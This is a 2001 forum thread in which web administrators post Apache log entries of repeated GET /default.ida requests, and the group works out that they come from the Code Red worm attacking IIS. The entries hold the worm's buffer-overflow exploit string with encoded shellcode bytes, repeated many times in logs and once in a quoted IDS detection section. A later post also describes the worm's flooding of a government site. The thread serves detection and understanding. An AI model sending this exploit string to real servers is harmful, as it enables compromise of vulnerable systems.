-
verrry interesting Apache logsnip
Look at this:
szptt170.szptt.net.cn - - [19/Jul/2001:10:45:59 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u6858%ucbd3
%u7801%u9090%u9090%u8190%u00c3%u0003
%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205
Hmmm. I might guess that this is a buffer overrun attempt, I cannot read raw machine code, (except for the no-ops and the one unconditional jump i see there) . What IS this guy doing, do you suppose? Is that an Apache attack or intended for IIS, or what? Anybody seen it before?
Thanks, Ray
[ 19 July 2001: Message edited by: posterboy ]
ray@raymondjones.net
HTTP://www.raymondjones.net
-
you could be right about the buffer overflow...
however, i'm not sure.
generally, if you try to overflow a buffer, you put garbage text, and then you put your commands...
that looks like garbage, and then machine code...
does %u perhaps indicate machine code?
if so, then see if you can decode it
Be what you would seem to be - or, if you'd like it put more simply - never imagine yourself not to be otherwise than what it might appear to others that what you were or might have been was not otherwise than what you had been would have appeared to them to be otherwise. --Lewis Carrol
-
61.135.53.8 - - [19/Jul/2001:11:55:16 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205
206.65.190.134 - - [19/Jul/2001:11:58:46 -0500] "GET /themes/Green/logo.gif HTTP/1.1" 304 -
206.65.190.134 - - [19/Jul/2001:11:58:47 -0500] "GET /index.php HTTP/1.1" 200 15595
209.116.117.194 - - [19/Jul/2001:12:16:47 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205
195.184.235.226 - - [19/Jul/2001:12:18:58 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205
212.19.62.202 - - [19/Jul/2001:12:48:00 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205
I don't know what the he!! this is supposed to do. I tried it on my own server but just got a 404 error.
[ 19 July 2001: Message edited by: The Whizzard ]
-
OK, this is getting werser and werser. I now have had this same NNNNNNNN (machine code) come from all the below addresses, and more. Is this something going wrong here locally, or are these spoofed addies, or what do you think?
n481p012.adsl.highway.telekom.at
62.254.162.177
203.145.135.11
1cust242.tnt3.erie.pa.da.uu.net
vector.fnal.gov
josheph.excite.com
24-29-154-30.nyc.rr.com
skinfillill.byu.edu
ajh444yqy12e.bc.hsia.telus.net
dinodung.kennesaw.edu
e3.wdata.com
There are maybe 15 more I didn't bother to C&P, but they all are identical. Apache is sending them all a 404 as I certainly don't have anything named default.ida, nor is the request properly formed, it ought to be something like GET / HTTP/1.0, and then the page, right?
I tried a few of these addresses
dinodung.kennesaaw.edu certainly does ping, as does e3.wdata.com, and some others. They are live machines, currently active on the internet. HEEEELLLLLPPPPPPP!!!!!!!! I don't understand this at all. Thanks, Ray
null
ray@raymondjones.net
HTTP://www.raymondjones.net
-
me too:
209.147.47.82 - - [19/Jul/2001:11:56:29 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
217.0.129.223 - - [19/Jul/2001:14:52:41 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
202.127.12.38 - - [19/Jul/2001:15:02:39 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
63.251.93.43 - - [19/Jul/2001:15:28:37 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190
%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
64.219.102.105 - - [19/Jul/2001:15:51:37 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%u cbd3%u7801%u9090%u9090%u81
90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
168.8.80.8 - - [19/Jul/2001:16:05:41 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucb d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 %u7801%u9090%u9090%u8190%u
00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
66.26.212.131 - - [19/Jul/2001:16:32:02 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
168.169.162.33 - - [19/Jul/2001:16:44:51 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%u cbd3%u7801%u9090%u9090%u81
90%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
211.50.29.89 - - [19/Jul/2001:17:05:34 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190
%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
211.39.34.211 - - [19/Jul/2001:17:06:24 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
203.235.44.30 - - [19/Jul/2001:17:11:28 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
I've got similar logs on two machines.
[ 19 July 2001: Message edited by: spickus ]
The UNIX philosophy basically involves giving you enough rope to
hang yourself. And then a couple of feet more, just to be sure.
-
I looked up apache error 400 - bad request.
http://www.bignosebird.com/apache/a5.shtml
The UNIX philosophy basically involves giving you enough rope to
hang yourself. And then a couple of feet more, just to be sure.
-
Yes, it is a mal-formed request. It can't answer GET /default.ida, it needs to look like GET / HTTP/1.0, however, in my initial post, note that I am sending them a 404, page not found error. I don't have a grip on that, either.
Ray
ray@raymondjones.net
HTTP://www.raymondjones.net
-
OK, here's something I found on the net, about the "Code-Red" worm. I have no idea that this is related, but, it's worth reading. http://news.cnet.com/news/0-1003-200...92.html?tag=lh
ray@raymondjones.net
HTTP://www.raymondjones.net
-
I think that's a different exploit. Man, I'm getting hammered with these.
[ 19 July 2001: Message edited by: spickus ]
The UNIX philosophy basically involves giving you enough rope to
hang yourself. And then a couple of feet more, just to be sure.
-
I just counted, I have 60 since this morning at 10:30 AM East Coast. Sheesh!!!!
Can anybody help us with what's going on, please?
ray@raymondjones.net
HTTP://www.raymondjones.net
-
I am pretty sure that that is looking for an IIS exploit. When I get off of work I will see if I still have the email I got about this. I think that what posterboy posted was right and it is the Code-Red worm
-
The UNIX philosophy basically involves giving you enough rope to
hang yourself. And then a couple of feet more, just to be sure.
-
I am now satisfied that this is indeed the "Code Red" thingy. This reference to the .ida stuff pulled me into that notion, as pointed to by spickus. Thank you for that, and I will relax a bit, as this doesn't target Apache at all. This thing is a bandwidth eater, but I can survive a few hits to the page, this is a hobby for me, and nothing more. I do feel for the admins running stuff commercially, this will surely have an impact. Why do companies run that buggy IIS thing, anyway? There's a new exploit every few weeks, it seems. Thanks to all you guys for helping us with this, this is one of the best possible uses for this board. In a couple of hours, the issue has been laid to rest. Good on you.
ray@raymondjones.net
HTTP://www.raymondjones.net
-
It is the code red worm ---
How many hits do you have so far?? I have 15 in my logs from today alone.
Apparently, they used a static random seed, so the random ip addresses genereated by each machine have been the same --
I've been hit 16 different times today, by different IP addresses
How many time you been hit?!
-
From the Code Red text file:
Introduction
============
On Friday July 13th we received packet logs and information from 2 network administrators that were experiencing large amounts of attacks targeting the recent .ida vulnerability that eEye Digital Security discovered (http://www.eeye.com/html/Research/Advisories/AD20010618.html) on June 18, 2001. After reviewing the logs sent to us we determined that in fact someone had released a worm into the Internet that was spreading rapidly through IIS web servers.
The full analysis of the .ida "Code Red" worm has provided numerous new details as to the functionality and method of propagation of this worm. For instance this worms purpose ultimately seems to be to perform a denial of service attack against www.whitehouse.gov. Also it has been found that only US English Windows NT/2000 systems will show the defaced ("Hacked by Chinese !") web page.
We've designated this the .ida "Code Red" worm, because part of the worm is designed to deface web pages with the text "Hacked by Chinese" and also because code red mountain dew was the only thing that kept us awake all last night to be able to disassemble this exploit even further.
How to setup your IDS to detect this specific worm?
---------------------------------------------------
The following is part of the packet data that is sent for this .ida "Code Red" worm attack:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0
Attack www.whitehouse.gov functionality
---------------------------------------
Sooner or later every thread within the worm seems to shift its attacking focus to www.whitehouse.gov.
1. create socket and connect to www.whitehouse.gov on port 80 and send 100k byes of data
CODEREF: seg000:000008AD WHITEHOUSE_SOCKET_SETUP
Initially the worm will create a socket and connect to 198.137.240.91 (www.whitehouse.gov/www1.whitehouse.gov) on port 80.
CODEREF: seg000:0000092F WHITEHOUSE_SOCKET_SEND
If this connection is made then the worm will create a loop that performs 18000h single byte send()'s to www.whitehouse.gov.
CODEREF: seg000:00000972 WHITEHOUSE_SLEEP_LOOP
After 18000h send()'s the worm will sleep for about 4 and a half hours. It will then repeat the attack against www.whitehouse.gov (goto step one of Attack www.whitehouse.gov functionality).
read up on the advisory...
what web server are you running? iis?
i hope you're not running apache, because that might mean that it infects apache as well...
that would suck ***...
but the file didn't say anything about it infecting apache, although that could just mean that they haven't found any code that relates to apache..
Be what you would seem to be - or, if you'd like it put more simply - never imagine yourself not to be otherwise than what it might appear to others that what you were or might have been was not otherwise than what you had been would have appeared to them to be otherwise. --Lewis Carrol
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|